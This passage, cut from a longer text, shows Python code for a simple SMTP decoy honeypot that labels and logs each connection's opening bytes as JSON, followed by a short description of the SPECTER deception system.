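    (b"HEAD ", "http-probe"),
    (b"POST ", "http-probe"),
    (b"SSH-", "ssh-client-banner"),
)


def classify(first_bytes):
    """Label a session by its opening bytes; anything unmatched is still logged as 'unknown'."""
    for prefix, label in SIGNATURES:
        if first_bytes.startswith(prefix):
            return label
    return "unknown"


def make_event(addr, first_bytes):
    """Build one structured log record for a connection to the decoy."""
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "src_ip": addr[0],
        "src_port": addr[1],
        "service": "smtp-decoy",
        "label": classify(first_bytes),
        # latin-1 never fails to decode, so binary probes are preserved byte-for-byte
        "first_bytes": first_bytes[:256].decode("latin-1"),
    }


def serve_one(conn, addr, events):
    """Send the decoy banner, capture what the client sends first, log it, and hang up."""
    first = b""
    try:
        conn.sendall(DECOY_BANNER)
        conn.settimeout(3.0)
        try:
            first = conn.recv(1024)
        except socket.timeout:
            pass  # silent connect-and-wait scans are still worth a record
    finally:
        conn.close()
    event = make_event(addr, first)
    events.append(event)
    print(json.dumps(event))  # one JSON line per session, easy to ship to a SIEM
    return event


def start_honeypot(host="127.0.0.1", port=0, max_conns=1):
    """Listen in a background thread for max_conns sessions; returns (port, events, thread)."""
    events = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound_port = srv.getsockname()[1]  # port 0 lets the OS pick a free port

    def loop():
        try:
            for _ in range(max_conns):
                conn, addr = srv.accept()
                serve_one(conn, addr, events)
        finally:
            srv.close()

    thread = threading.Thread(target=loop, daemon=True)
    thread.start()
    return bound_port, events, thread


def probe(port, payload, host="127.0.0.1"):
    """Act as a client hitting the decoy (used by demo()); returns the banner it received."""
    with socket.create_connection((host, port), timeout=3.0) as c:
        banner = c.recv(1024)
        c.sendall(payload)
    return banner


def demo():
    """End-to-end run on localhost with two constructed probes; returns (banners, events)."""
    port, events, thread = start_honeypot(max_conns=2)
    banners = [
        probe(port, b"EHLO scanner.test\r\n"),
        probe(port, b"GET / HTTP/1.0\r\n\r\n"),
    ]
    thread.join(10.0)
    return banners, events


if __name__ == "__main__":
    demo()
```

Running the file prints one JSON record per session. The design choice that matters for a real deployment is that the decoy never implements the protocol it advertises: it only speaks the banner, captures the opening bytes, and closes, so there is nothing an attacker can actually use, while every contact still produces a timestamped, source-attributed record that can be correlated with firewall and NIDS logs.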
■ SPECTER
Source: http://www.specter.com
SPECTER is a honeypot or deception system. It simulates a complete system and provides an appealing target to lure hackers away from production systems. It offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it is a trap: it confuses attackers so that they leave traces, without realizing that they have connected to a decoy system that does none of the things it appears to do; instead, it logs everything and notifies the appropriate people.
Furthermore, SPECTER automatically investigates attackers while they are still trying to break in. It provides massive amounts of decoy content, and it generates decoy programs that cannot leave hidden marks on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change regularly without user interaction.
